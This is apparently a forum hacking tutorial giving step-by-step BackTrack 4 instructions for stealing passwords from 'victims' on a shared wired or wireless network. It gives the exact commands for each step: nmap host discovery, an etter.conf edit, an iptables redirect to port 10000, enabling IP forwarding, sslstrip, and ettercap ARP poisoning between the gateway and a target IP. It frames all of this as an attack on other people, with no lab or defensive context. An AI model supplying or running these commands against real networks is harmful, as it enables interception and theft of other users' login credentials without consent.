[TUT] Hacking Passwords on Wireless/Wired Network

Requirements


Backtrack 4
Some knowledge of linux
Access to a network
Victims

Software Being Used

ettercap
nmap
sslstrip
nano
ping
route
iptables
ifconfig

The First Step - Starting Backtrack 4

Start up backtrack 4 in your pc. It will start out in a terminal so issue the command startx to get to a desktop environment.

The Second Step - Starting Your Network Interface

You will need to click the bottom-left icon and select internet then select Wicd Network Manager. For this presentation I will be using my eth0 interface, you can substitute this with another interface like wlan0 if you are connecting to a wireless network

The Third Step - Finding out the subnet


First you will need to open the terminal it is the icon next to the firefox icon on the bar at the bottom of the screen. Next ou need to find out the subnet and your default gateway address. You can do this by issuing the route command in the terminal. it will give a list of stuff but you want the column that says Gateway and the bottom most option. you will need to issue the ping command to the gateway name or ip address. In the video it says tomato and it didn't ping but it's ip is 192.168.1.1.

The Fourth Step - Finding Victims to Sniff

We will now issue the command nmap -sP [default gateway ip]/24 this will scan all the ip addresses in that subnet. Make sure to enter in the default gateway's ip address and not [default gateway ip] in the command. Once you have found a victim remember that ip address we wil be using it in a later command.

The Fifth Step - Editing A File and Setting iptables

You will need to edit edit a file called etter.conf in the etc directory. So in the terminal issue the command nano /etc/etter.conf. You will need to find the line containing.

Code:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

You will need to delete the two "#" to make it look like this.

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Once you have finished that hold ctrl and press x and then press y and then enter. This will save the file. Once you have finished that you will need to setup iptables. Just type/copy paste this command into the terminal and press enter.

Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Then you will need to issue another command.
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

Once you have completed that you are done configuring and ready to start sniffing.

The Sixth Step - Sniffing Logon Details

You will first need to open another terminal and in that terminal issue the command sslstrip -a -k -f. Then you will need to return to the other terminal that is open and you will need to issue the command to start sniffing. Make sure to substitue your interface if you are using something other than eth0. In this command the first ip address you have to enter is the default gateway ip address. The second address you enter is the ip address of the victim.
Code:
ettercap -T -i eth0 -q -M arp:remote /192.168.1.1/ /192.168.1.33/

Do not Forget to use SSL strip command


Thats all ...



Once you have entered that command you will need to wait until the victim has logged onto a site and once they have it will appear in the terminal.

Woah !!

Reviews needed.